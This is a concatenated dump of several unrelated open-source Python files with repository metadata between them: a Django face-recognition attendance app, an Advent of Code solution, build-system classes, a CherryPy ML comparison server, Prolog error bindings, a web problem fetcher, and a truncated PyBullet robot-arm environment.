(time.time()-start[pred]) > 1.2: count[pred] = 0 else: #if count[pred] == 4 and (time.time()-start) <= 1.5: present[pred] = True log_time[pred] = datetime.datetime.now() count[pred] = count.get(pred,0) + 1 print(pred, present[pred], count[pred]) cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) else: person_name="unknown" cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) #cv2.putText() # Before continuing to the next loop, I want to give it a little pause # waitKey of 100 millisecond #cv2.waitKey(50) #Showing the image in another window #Creates a window with window name "Face" and with the image img cv2.imshow("Mark Attendance - In - Press q to exit",frame) #Before closing it we need to give a wait command, otherwise the open cv wont work # @params with the millisecond of delay 1 #cv2.waitKey(1) #To get out of the loop key=cv2.waitKey(50) & 0xFF if(key==ord("q")): break #Stoping the videostream vs.stop() # destroying all the windows cv2.destroyAllWindows() update_attendance_in_db_in(present) return redirect('home') def mark_your_attendance_out(request): detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER svc_save_path="face_recognition_data/svc.sav" with open(svc_save_path, 'rb') as f: svc = pickle.load(f) fa = FaceAligner(predictor , desiredFaceWidth = 96) encoder=LabelEncoder() encoder.classes_ = np.load('face_recognition_data/classes.npy') faces_encodings = np.zeros((1,128)) no_of_faces = len(svc.predict_proba(faces_encodings)[0]) count = dict() present = dict() log_time = dict() start = dict() for i in range(no_of_faces): count[encoder.inverse_transform([i])[0]] = 0 present[encoder.inverse_transform([i])[0]] = False vs = VideoStream(src=0).start() sampleNum = 0 while(True): frame = vs.read() frame = imutils.resize(frame ,width = 800) gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) faces = detector(gray_frame,0) for face in faces: print("INFO : inside for loop") (x,y,w,h) = face_utils.rect_to_bb(face) face_aligned = fa.align(frame,gray_frame,face) cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1) (pred,prob)=predict(face_aligned,svc) if(pred!=[-1]): person_name=encoder.inverse_transform(np.ravel([pred]))[0] pred=person_name if count[pred] == 0: start[pred] = time.time() count[pred] = count.get(pred,0) + 1 if count[pred] == 4 and (time.time()-start[pred]) > 1.5: count[pred] = 0 else: #if count[pred] == 4 and (time.time()-start) <= 1.5: present[pred] = True log_time[pred] = datetime.datetime.now() count[pred] = count.get(pred,0) + 1 print(pred, present[pred], count[pred]) cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) else: person_name="unknown" cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) #cv2.putText() # Before continuing to the next loop, I want to give it a little pause # waitKey of 100 millisecond #cv2.waitKey(50) #Showing the image in another window #Creates a window with window name "Face" and with the image img cv2.imshow("Mark Attendance- Out - Press q to exit",frame) #Before closing it we need to give a wait command, otherwise the open cv wont work # @params with the millisecond of delay 1 #cv2.waitKey(1) #To get out of the loop key=cv2.waitKey(50) & 0xFF if(key==ord("q")): break #Stoping the videostream vs.stop() # destroying all the windows cv2.destroyAllWindows() update_attendance_in_db_out(present) return redirect('home') @login_required def train(request): if request.user.username!='admin': return redirect('not-authorised') training_dir='face_recognition_data/training_dataset' count=0 for person_name in os.listdir(training_dir): curr_directory=os.path.join(training_dir,person_name) if not os.path.isdir(curr_directory): continue for imagefile in image_files_in_folder(curr_directory): count+=1 X=[] y=[] i=0 for person_name in os.listdir(training_dir): print(str(person_name)) curr_directory=os.path.join(training_dir,person_name) if not os.path.isdir(curr_directory): continue for imagefile in image_files_in_folder(curr_directory): print(str(imagefile)) image=cv2.imread(imagefile) try: X.append((face_recognition.face_encodings(image)[0]).tolist()) y.append(person_name) i+=1 except: print("removed") os.remove(imagefile) targets=np.array(y) encoder = LabelEncoder() encoder.fit(y) y=encoder.transform(y) X1=np.array(X) print("shape: "+ str(X1.shape)) np.save('face_recognition_data/classes.npy', encoder.classes_) svc = SVC(kernel='linear',probability=True) svc.fit(X1,y) svc_save_path="face_recognition_data/svc.sav" with open(svc_save_path, 'wb') as f: pickle.dump(svc,f) vizualize_Data(X1,targets) messages.success(request, f'Training Complete.') return render(request,"recognition/train.html") @login_required def not_authorised(request): return render(request,'recognition/not_authorised.html') @login_required def view_attendance_home(request): total_num_of_emp=total_number_employees() emp_present_today=employees_present_today() this_week_emp_count_vs_date() last_week_emp_count_vs_date() return render(request,"recognition/view_attendance_home.html", {'total_num_of_emp' : total_num_of_emp, 'emp_present_today': emp_present_today}) @login_required def view_attendance_date(request): if request.user.username!='admin': return redirect('not-authorised') qs=None time_qs=None present_qs=None if request.method=='POST': form=DateForm(request.POST) if form.is_valid(): date=form.cleaned_data.get('date') print("date:"+ str(date)) time_qs=Time.objects.filter(date=date) present_qs=Present.objects.filter(date=date) if(len(time_qs)>0 or len(present_qs)>0): qs=hours_vs_employee_given_date(present_qs,time_qs) return render(request,'recognition/view_attendance_date.html', {'form' : form,'qs' : qs }) else: messages.warning(request, f'No records for selected date.') return redirect('view-attendance-date') else: form=DateForm() return render(request,'recognition/view_attendance_date.html', {'form' : form, 'qs' : qs}) @login_required def view_attendance_employee(request): if request.user.username!='admin': return redirect('not-authorised') time_qs=None present_qs=None qs=None if request.method=='POST': form=UsernameAndDateForm(request.POST) if form.is_valid(): username=form.cleaned_data.get('username') if username_present(username): u=User.objects.get(username=username) time_qs=Time.objects.filter(user=u) present_qs=Present.objects.filter(user=u) date_from=form.cleaned_data.get('date_from') date_to=form.cleaned_data.get('date_to') if date_to < date_from: messages.warning(request, f'Invalid date selection.') return redirect('view-attendance-employee') else: time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') if (len(time_qs)>0 or len(present_qs)>0): qs=hours_vs_date_given_employee(present_qs,time_qs,admin=True) return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs}) else: #print("inside qs is None") messages.warning(request, f'No records for selected duration.') return redirect('view-attendance-employee') else: print("invalid username") messages.warning(request, f'No such username found.') return redirect('view-attendance-employee') else: form=UsernameAndDateForm() return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs}) @login_required def view_my_attendance_employee_login(request): if request.user.username=='admin': return redirect('not-authorised') qs=None time_qs=None present_qs=None if request.method=='POST': form=DateForm_2(request.POST) if form.is_valid(): u=request.user time_qs=Time.objects.filter(user=u) present_qs=Present.objects.filter(user=u) date_from=form.cleaned_data.get('date_from') date_to=form.cleaned_data.get('date_to') if date_to < date_from: messages.warning(request, f'Invalid date selection.') return redirect('view-my-attendance-employee-login') else: time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') if (len(time_qs)>0 or len(present_qs)>0): qs=hours_vs_date_given_employee(present_qs,time_qs,admin=False) return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs}) else: messages.warning(request, f'No records for selected duration.') return redirect('view-my-attendance-employee-login') else: form=DateForm_2() return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs})
24.97619
167
0.722196
0
0
0
0
6,494
0.257944
0
0
6,139
0.243843
bec698afd2c5801e7a05fe6be1339638668af844
856
py
Python
2018/05.py
GillesArcas/Advent_of_Code
1f57eb1686875df2684b0d56916b1d20724e9fb9
[ "MIT" ]
null
null
null
2018/05.py
GillesArcas/Advent_of_Code
1f57eb1686875df2684b0d56916b1d20724e9fb9
[ "MIT" ]
null
null
null
2018/05.py
GillesArcas/Advent_of_Code
1f57eb1686875df2684b0d56916b1d20724e9fb9
[ "MIT" ]
null
null
null
import re import string DATA = '05.txt' def react(polymer): pairs = '|'.join([a + b + '|' + b + a for a, b in zip(string.ascii_lowercase, string.ascii_uppercase)]) length = len(polymer) while 1: polymer = re.sub(pairs, '', polymer) if len(polymer) == length: return(length) else: length = len(polymer) def code1(): with open(DATA) as f: polymer = f.readline().strip() print('1>', react(polymer)) def code2(): with open(DATA) as f: polymer = f.readline().strip() minlength = len(polymer) for c in string.ascii_lowercase: polymer2 = re.sub(c, '', polymer, flags=re.I) length = react(polymer2) if length < minlength: minlength = length print('2>', minlength) code1() code2()
21.948718
108
0.53972
0
0
0
0
0
0
0
0
26
0.030374
bec6becd26fa525cff31dffaad9d3ab5e8f46f15
11,873
py
Python
lib/fbuild/builders/__init__.py
felix-lang/fbuild
9595fbfd6d3ceece31fda2f96c35d4a241f0129b
[ "PSF-2.0", "BSD-2-Clause" ]
40
2015-02-07T00:44:12.000Z
2021-04-02T13:41:08.000Z
lib/fbuild/builders/__init__.py
felix-lang/fbuild
9595fbfd6d3ceece31fda2f96c35d4a241f0129b
[ "PSF-2.0", "BSD-2-Clause" ]
30
2015-02-06T17:45:15.000Z
2019-01-10T16:34:29.000Z
lib/fbuild/builders/__init__.py
felix-lang/fbuild
9595fbfd6d3ceece31fda2f96c35d4a241f0129b
[ "PSF-2.0", "BSD-2-Clause" ]
3
2015-09-03T06:38:02.000Z
2019-10-24T14:26:57.000Z
import abc import contextlib import os import sys from functools import partial from itertools import chain import fbuild import fbuild.db import fbuild.path import fbuild.temp from . import platform # ------------------------------------------------------------------------------ class MissingProgram(fbuild.ConfigFailed): def __init__(self, programs=None): self.programs = programs def __str__(self): if self.programs is None: return 'cannot find program' else: return 'cannot find any of the programs %s' % \ ' '.join(repr(str(p)) for p in self.programs) # ------------------------------------------------------------------------------ @fbuild.db.caches def find_program(ctx, names, paths=None, *, quieter=0): """L{find_program} is a test that searches the paths for one of the programs in I{name}. If one is found, it is returned. If not, the next name in the list is searched for.""" if paths is None: paths = os.environ['PATH'].split(os.pathsep) # If we're running on windows, we need to append '.exe' to the filenames # that we're searching for. if sys.platform == 'win32': new_names = [] for name in names: if \ not name.endswith('.exe') or \ not name.endswith('.cmd') or \ not name.endswith('.bat'): new_names.append(name + '.exe') new_names.append(name + '.cmd') new_names.append(name + '.bat') new_names.append(name) names = new_names for name in names: filename = fbuild.path.Path(name) ctx.logger.check('looking for ' + filename.name, verbose=quieter) if filename.exists() and filename.isfile(): ctx.logger.passed('ok %s' % filename, verbose=quieter) return fbuild.path.Path(name) else: for path in paths: filename = fbuild.path.Path(path, name) if filename.exists() and filename.isfile(): ctx.logger.passed('ok %s' % filename, verbose=quieter) return fbuild.path.Path(filename) ctx.logger.failed(verbose=quieter) raise MissingProgram(names) # ------------------------------------------------------------------------------ def check_version(ctx, builder, version_function, *, requires_version=None, requires_at_least_version=None, requires_at_most_version=None): """Helper function to simplify checking the version of a builder.""" if any(v is not None for v in ( requires_version, requires_at_least_version, requires_at_most_version)): ctx.logger.check('checking %s version' % builder) version_str = version_function() # Convert the version into a tuple version = [] for i in version_str.split('.'): try: version.append(int(i)) except ValueError: # The subversion isn't a number, so just convert it to a # string. version.append(i) version = tuple(version) if requires_version is not None and requires_version != version: msg = 'version %s required; found %s' % ( '.'.join(str(i) for i in requires_version), version_str) ctx.logger.failed(msg) raise fbuild.ConfigFailed(msg) if requires_at_least_version is not None and \ requires_at_least_version > version: msg = 'at least version %s required; found %s' % ( '.'.join(str(i) for i in requires_at_least_version), version_str) ctx.logger.failed(msg) raise fbuild.ConfigFailed(msg) if requires_at_most_version is not None and \ requires_at_most_version < version: msg = 'at most version %s required; found %s' % ( '.'.join(str(i) for i in requires_at_most_version), version_str) ctx.logger.failed(msg) raise fbuild.ConfigFailed(msg) ctx.logger.passed(version_str) # ------------------------------------------------------------------------------ class AbstractCompiler(fbuild.db.PersistentObject): def __init__(self, *args, src_suffix, **kwargs): super().__init__(*args, **kwargs) self.src_suffix = src_suffix @fbuild.db.cachemethod def compile(self, src:fbuild.db.SRC, *args, **kwargs) -> fbuild.db.DST: return self.uncached_compile(src, *args, **kwargs) @abc.abstractmethod def uncached_compile(self, src, *args, **kwargs): pass @fbuild.db.cachemethod @platform.auto_platform_options() def build_objects(self, srcs:fbuild.db.SRCS, *args, **kwargs) -> \ fbuild.db.DSTS: """Compile all of the passed in L{srcs} in parallel.""" # When a object has extra external dependencies, such as .c files # depending on .h changes, depending on library changes, we need to add # the dependencies in build_objects. Unfortunately, the db doesn't # know about these new files and so it can't tell when a function # really needs to be rerun. So, we'll just not cache this function. # We need to add extra dependencies to our call. objs = [] src_deps = [] dst_deps = [] for o, s, d in self.ctx.scheduler.map( partial(self.compile.call, *args, **kwargs), srcs): objs.append(o) src_deps.extend(s) dst_deps.extend(d) self.ctx.db.add_external_dependencies_to_call( srcs=src_deps, dsts=dst_deps) return objs # -------------------------------------------------------------------------- def tempfile(self, code): return fbuild.temp.tempfile(code, self.src_suffix) @contextlib.contextmanager def tempfile_compile(self, code='', *, quieter=1, **kwargs): with self.tempfile(code) as src: yield self.uncached_compile(src, quieter=quieter, **kwargs) @platform.auto_platform_options() def try_compile(self, *args, **kwargs): try: with self.tempfile_compile(*args, **kwargs): return True except fbuild.ExecutionError: return False @platform.auto_platform_options() def check_compile(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_compile(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False # ------------------------------------------------------------------------------ class AbstractLibLinker(AbstractCompiler): @fbuild.db.cachemethod @platform.auto_platform_options() def link_lib(self, dst, srcs:fbuild.db.SRCS, *args, libs:fbuild.db.SRCS=(), **kwargs) -> fbuild.db.DST: """Link compiled files into a library and caches the results.""" return self.uncached_link_lib(dst, srcs, *args, libs=libs, **kwargs) @abc.abstractmethod def uncached_link_lib(self, *args, **kwargs): pass @platform.auto_platform_options() def build_lib(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}): """Compile all of the passed in L{srcs} in parallel, then link them into a library.""" objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs))) return self.link_lib(dst, objs, libs=libs, **lkwargs) # -------------------------------------------------------------------------- @contextlib.contextmanager @platform.auto_platform_options() def tempfile_link_lib(self, code='', *, quieter=1, ckwargs={}, **kwargs): with self.tempfile(code) as src: dst = src.parent / 'temp' obj = self.uncached_compile(src, quieter=quieter, **ckwargs) yield self.uncached_link_lib(dst, [obj], quieter=quieter, **kwargs) def try_link_lib(self, *args, **kwargs): try: with self.tempfile_link_lib(*args, **kwargs): return True except fbuild.ExecutionError: return False def check_link_lib(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_link_lib(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False # ------------------------------------------------------------------------------ class AbstractRunner(fbuild.db.PersistentObject): @abc.abstractmethod def tempfile_run(self, *args, **kwargs): pass def try_run(self, code='', quieter=1, **kwargs): try: self.tempfile_run(code, quieter=quieter, **kwargs) except fbuild.ExecutionError: return False else: return True def check_run(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_run(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False # ------------------------------------------------------------------------------ class AbstractExeLinker(AbstractCompiler, AbstractRunner): @fbuild.db.cachemethod @platform.auto_platform_options() def link_exe(self, dst, srcs:fbuild.db.SRCS, *args, libs:fbuild.db.SRCS=(), **kwargs) -> fbuild.db.DST: """Link compiled files into an executable.""" return self.uncached_link_exe(dst, srcs, *args, libs=libs, **kwargs) @abc.abstractmethod def uncached_link_exe(self, *args, **kwargs): pass @platform.auto_platform_options() def build_exe(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}): """Compile all of the passed in L{srcs} in parallel, then link them into an executable.""" objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs))) return self.link_exe(dst, objs, libs=libs, **lkwargs) # -------------------------------------------------------------------------- @contextlib.contextmanager @platform.auto_platform_options() def tempfile_link_exe(self, code='', *, quieter=1, ckwargs={}, **kwargs): with self.tempfile(code) as src: dst = src.parent / 'temp' obj = self.uncached_compile(src, quieter=quieter, **ckwargs) yield self.uncached_link_exe(dst, [obj], quieter=quieter, **kwargs) @platform.auto_platform_options() def try_link_exe(self, *args, **kwargs): try: with self.tempfile_link_exe(*args, **kwargs): return True except fbuild.ExecutionError: return False @platform.auto_platform_options() def check_link_exe(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_link_exe(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False @platform.auto_platform_options() def tempfile_run(self, *args, quieter=1, ckwargs={}, lkwargs={}, **kwargs): with self.tempfile_link_exe(*args, quieter=quieter, ckwargs=ckwargs, **lkwargs) as exe: return self.ctx.execute([exe], quieter=quieter, cwd=exe.parent, **kwargs) # ------------------------------------------------------------------------------ class AbstractCompilerBuilder(AbstractLibLinker, AbstractExeLinker): pass
35.762048
80
0.553609
7,575
0.638002
783
0.065948
6,949
0.585278
0
0
2,359
0.198686
bec79a34dea2c5eb7b1cdd952dbf003070a952c4
1,746
py
Python
WebServer.py
i3uex/CompareML
3d53d58117507db11ad08ca0b1c883ec0997840e
[ "MIT" ]
null
null
null
WebServer.py
i3uex/CompareML
3d53d58117507db11ad08ca0b1c883ec0997840e
[ "MIT" ]
null
null
null
WebServer.py
i3uex/CompareML
3d53d58117507db11ad08ca0b1c883ec0997840e
[ "MIT" ]
null
null
null
import json import cherrypy import engine class WebServer(object): @cherrypy.expose def index(self): return open('public/index.html', encoding='utf-8') @cherrypy.expose class GetOptionsService(object): @cherrypy.tools.accept(media='text/plain') def GET(self): return json.dumps({ 'providers': engine.get_providers(), 'algorithms': engine.get_algorithms(), 'default_datasets': engine.get_all_default_datasets() }) @cherrypy.expose class SetOptionsService(object): @cherrypy.tools.accept(media='text/plain') def POST(self, options): """ Use the options selected by the user to execute all algorithms :param options: { is_default_dataset: bool, dataset: str, providers: [] algorithms: [] target: str } if is_default_dataset is true, dataset will contain the name of the default_dataset""" options_dic = json.loads(options) try: result = engine.execute(options_dic['is_default_dataset'], options_dic['dataset'], options_dic['providers'], options_dic['algorithms'], options_dic['target']) except Exception as exception: message = f"{str(exception)}" raise cherrypy.HTTPError(500, message=message) return result @cherrypy.expose @cherrypy.tools.json_out() class GetDefaultDatasetHeadersService(object): @cherrypy.tools.accept(media='text/plain') def GET(self, default_dataset_name): return {'headers': engine.get_default_dataset_headers(default_dataset_name)}
30.103448
120
0.611684
1,613
0.923826
0
0
1,662
0.95189
0
0
576
0.329897
bec81857d7e4af0801337540f4b978497c5536f9
1,897
py
Python
tuprolog/solve/exception/error/existence/__init__.py
DavideEva/2ppy
55609415102f8116165a42c8e33e029c4906e160
[ "Apache-2.0" ]
1
2021-08-07T06:29:28.000Z
2021-08-07T06:29:28.000Z
tuprolog/solve/exception/error/existence/__init__.py
DavideEva/2ppy
55609415102f8116165a42c8e33e029c4906e160
[ "Apache-2.0" ]
14
2021-09-16T13:25:12.000Z
2022-01-03T10:12:22.000Z
tuprolog/solve/exception/error/existence/__init__.py
DavideEva/2ppy
55609415102f8116165a42c8e33e029c4906e160
[ "Apache-2.0" ]
1
2021-12-22T00:25:32.000Z
2021-12-22T00:25:32.000Z
from typing import Union from tuprolog import logger # noinspection PyUnresolvedReferences import jpype.imports # noinspection PyUnresolvedReferences import it.unibo.tuprolog.solve.exception.error as errors from tuprolog.core import Term, Atom from tuprolog.solve import ExecutionContext, Signature ExistenceError = errors.ExistenceError ObjectType = ExistenceError.ObjectType OBJECT_PROCEDURE = ObjectType.PROCEDURE OBJECT_SOURCE_SINK = ObjectType.SOURCE_SINK OBJECT_RESOURCE = ObjectType.RESOURCE OBJECT_STREAM = ObjectType.STREAM OBJECT_OOP_ALIAS = ObjectType.OOP_ALIAS OBJECT_OOP_METHOD = ObjectType.OOP_METHOD OBJECT_OOP_CONSTRUCTOR = ObjectType.OOP_CONSTRUCTOR OBJECT_OOP_PROPERTY = ObjectType.OOP_PROPERTY def existence_error( context: ExecutionContext, type: ObjectType, culprit: Term, message: str ) -> ExistenceError: return ExistenceError.of(context, type, culprit, message) def existence_error_for_source_sink( context: ExecutionContext, alias: Union[Atom, str] ) -> ExistenceError: return ExistenceError.forSourceSink(context, alias) def existence_error_for_procedure( context: ExecutionContext, procedure: Signature ) -> ExistenceError: return ExistenceError.forProcedure(context, procedure) def existence_error_for_stream( context: ExecutionContext, stream: Term ) -> ExistenceError: return ExistenceError.forStream(context, stream) def existence_error_for_resource( context: ExecutionContext, name: str ) -> ExistenceError: return ExistenceError.forResource(context, name) def object_type(name: Union[str, Term]) -> ObjectType: if isinstance(name, str): return ObjectType.of(name) else: return ObjectType.fromTerm(name) logger.debug("Loaded JVM classes from it.unibo.tuprolog.solve.exception.error.ExistenceError.*")
24.960526
96
0.765946
0
0
0
0
0
0
0
0
156
0.082235
bec831a08a3c7355e5ebc6786562ec7da94bccbd
2,421
py
Python
cptk/core/fetcher.py
RealA10N/cptk
e500d948e91bb70661adc3c2539b149704c734a1
[ "Apache-2.0" ]
5
2021-12-25T01:49:45.000Z
2022-03-27T10:30:14.000Z
cptk/core/fetcher.py
RealA10N/cptk
e500d948e91bb70661adc3c2539b149704c734a1
[ "Apache-2.0" ]
39
2021-12-24T16:35:07.000Z
2022-03-18T23:15:14.000Z
cptk/core/fetcher.py
RealA10N/cptk
e500d948e91bb70661adc3c2539b149704c734a1
[ "Apache-2.0" ]
2
2022-01-12T19:13:20.000Z
2022-01-12T19:32:05.000Z
from __future__ import annotations from typing import TYPE_CHECKING import pkg_resources from bs4 import BeautifulSoup from requests import session from cptk.scrape import PageInfo from cptk.scrape import Website from cptk.utils import cptkException if TYPE_CHECKING: from cptk.scrape import Problem class InvalidClone(cptkException): """ Raised when the clone command is called with a 'PageInfo' instance that doesn't describe anything that can be cloned. """ def __init__(self, info: PageInfo) -> None: self.info = info super().__init__(f"We don't know how to handle data from {info.url!r}") class UnknownWebsite(cptkException): """ Raised when trying to fetch information from a website that is not registed and can't be handled by cptk. """ def __init__(self, domain: str) -> None: self.domain = domain super().__init__(f"We don't know how to handle data from {domain!r}") class Fetcher: def __init__(self) -> None: self.session = session() self._load_websites() def _load_websites(self) -> list[type[Website]]: self._websites = [ point.load()() for point in pkg_resources.iter_entry_points('cptk_sites') ] self._domain_to_website = dict() for website in self._websites: domain = website.domain if isinstance(domain, str): self._domain_to_website[domain] = website else: for cur in domain: self._domain_to_website[cur] = website def page_to_problem(self, info: PageInfo) -> Problem: """ Recives an arbitrary page info instance and tries to match it with a Website class that knows how to handle this specific website. If cptk doesn't find a way to parse the given webpage, it raises the 'InvalidClone' exception. """ for website in self._websites: if website.is_problem(info): return website.to_problem(info) raise InvalidClone(info) def to_page(self, url: str) -> PageInfo: """ Makes an get http/s request to the given URL and returns the result as a PageInfo instance. """ if not url.startswith('http'): url = f'http://{url}' res = self.session.get(url) data = BeautifulSoup(res.content, 'lxml') return PageInfo(url, data)
31.441558
79
0.646014
2,104
0.869062
0
0
0
0
0
0
753
0.311029
bec8b40804691cfab7d99feee2707b808f11aaed
15,006
py
Python
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py
Hinson-A/guyueclass
e59129526729542dccefa6c7232378a00dc0175a
[ "Apache-2.0" ]
227
2021-01-20T05:34:32.000Z
2022-03-29T12:43:05.000Z
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py
passYYYY/guyueclass
2054ccec2f5e6c002727a5561b494a1046484504
[ "Apache-2.0" ]
1
2021-04-22T05:56:00.000Z
2021-05-26T06:00:17.000Z
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py
passYYYY/guyueclass
2054ccec2f5e6c002727a5561b494a1046484504
[ "Apache-2.0" ]
239
2021-01-28T02:59:53.000Z
2022-03-29T08:02:17.000Z
import pybullet as p import pybullet_data import gym from gym import spaces from gym.utils import seeding import numpy as np from math import sqrt import random import time import math import cv2 import torch import os def random_crop(imgs, out): """ args: imgs: shape (B,C,H,W) out: output size (e.g. 84) """ n, c, h, w = imgs.shape crop_max = h - out + 1 w1 = np.random.randint(0, crop_max, n) h1 = np.random.randint(0, crop_max, n) cropped = np.empty((n, c, out, out), dtype=imgs.dtype) for i, (img, w11, h11) in enumerate(zip(imgs, w1, h1)): cropped[i] = img[:, h11:h11 + out, w11:w11 + out] return cropped class KukaReachVisualEnv(gym.Env): metadata = { 'render.modes': ['human', 'rgb_array'], 'video.frames_per_second': 50 } kMaxEpisodeSteps = 700 kImageSize = {'width': 96, 'height': 96} kFinalImageSize = {'width': 84, 'height': 84} def __init__(self, is_render=False, is_good_view=False): self.is_render = is_render self.is_good_view = is_good_view if self.is_render: p.connect(p.GUI) else: p.connect(p.DIRECT) self.x_low_obs = 0.2 self.x_high_obs = 0.7 self.y_low_obs = -0.3 self.y_high_obs = 0.3 self.z_low_obs = 0 self.z_high_obs = 0.55 self.x_low_action = -0.4 self.x_high_action = 0.4 self.y_low_action = -0.4 self.y_high_action = 0.4 self.z_low_action = -0.6 self.z_high_action = 0.3 self.step_counter = 0 self.urdf_root_path = pybullet_data.getDataPath() # lower limits for null space self.lower_limits = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05] # upper limits for null space self.upper_limits = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05] # joint ranges for null space self.joint_ranges = [5.8, 4, 5.8, 4, 5.8, 4, 6] # restposes for null space self.rest_poses = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0] # joint damping coefficents self.joint_damping = [ 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001 ] self.init_joint_positions = [ 0.006418, 0.413184, -0.011401, -1.589317, 0.005379, 1.137684, -0.006539 ] self.orientation = p.getQuaternionFromEuler( [0., -math.pi, math.pi / 2.]) self.camera_parameters = { 'width': 960., 'height': 720, 'fov': 60, 'near': 0.1, 'far': 100., 'eye_position': [0.59, 0, 0.8], 'target_position': [0.55, 0, 0.05], 'camera_up_vector': [1, 0, 0], # I really do not know the parameter's effect. 'light_direction': [ 0.5, 0, 1 ], # the direction is from the light source position to the origin of the world frame. } self.view_matrix = p.computeViewMatrixFromYawPitchRoll( cameraTargetPosition=[0.55, 0, 0.05], distance=.7, yaw=90, pitch=-70, roll=0, upAxisIndex=2) self.projection_matrix = p.computeProjectionMatrixFOV( fov=self.camera_parameters['fov'], aspect=self.camera_parameters['width'] / self.camera_parameters['height'], nearVal=self.camera_parameters['near'], farVal=self.camera_parameters['far']) p.configureDebugVisualizer(lightPosition=[5, 0, 5]) p.resetDebugVisualizerCamera(cameraDistance=1.5, cameraYaw=0, cameraPitch=-40, cameraTargetPosition=[0.55, -0.35, 0.2]) self.action_space = spaces.Box(low=np.array( [self.x_low_action, self.y_low_action, self.z_low_action]), high=np.array([ self.x_high_action, self.y_high_action, self.z_high_action ]), dtype=np.float32) self.observation_space = spaces.Box(low=0, high=1, shape=(1, self.kFinalImageSize['width'], self.kFinalImageSize['height'])) self.seed() self.reset() def seed(self, seed=None): self.np_random, seed = seeding.np_random(seed) return [seed] def reset(self): self.step_counter = 0 p.resetSimulation() # p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0) self.terminated = False p.setGravity(0, 0, -10) # 这些是周围那些白线,用来观察是否超过了obs的边界 p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_low_obs, 0], lineToXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_high_obs, 0], lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_high_obs, self.y_low_obs, 0], lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_high_obs, self.y_high_obs, 0], lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs], lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs], lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs], lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs]) p.addUserDebugLine( lineFromXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs], lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs]) p.loadURDF(os.path.join(self.urdf_root_path, "plane.urdf"), basePosition=[0, 0, -0.65]) self.kuka_id = p.loadURDF(os.path.join(self.urdf_root_path, "kuka_iiwa/model.urdf"), useFixedBase=True) table_uid = p.loadURDF(os.path.join(self.urdf_root_path, "table/table.urdf"), basePosition=[0.5, 0, -0.65]) p.changeVisualShape(table_uid, -1, rgbaColor=[1, 1, 1, 1]) self.object_id = p.loadURDF(os.path.join(self.urdf_root_path, "random_urdfs/000/000.urdf"), basePosition=[ random.uniform(self.x_low_obs, self.x_high_obs), random.uniform(self.y_low_obs, self.y_high_obs), 0.01 ]) self.num_joints = p.getNumJoints(self.kuka_id) for i in range(self.num_joints): p.resetJointState( bodyUniqueId=self.kuka_id, jointIndex=i, targetValue=self.init_joint_positions[i], ) self.robot_pos_obs = p.getLinkState(self.kuka_id, self.num_joints - 1)[4] p.stepSimulation() (_, _, px, _, _) = 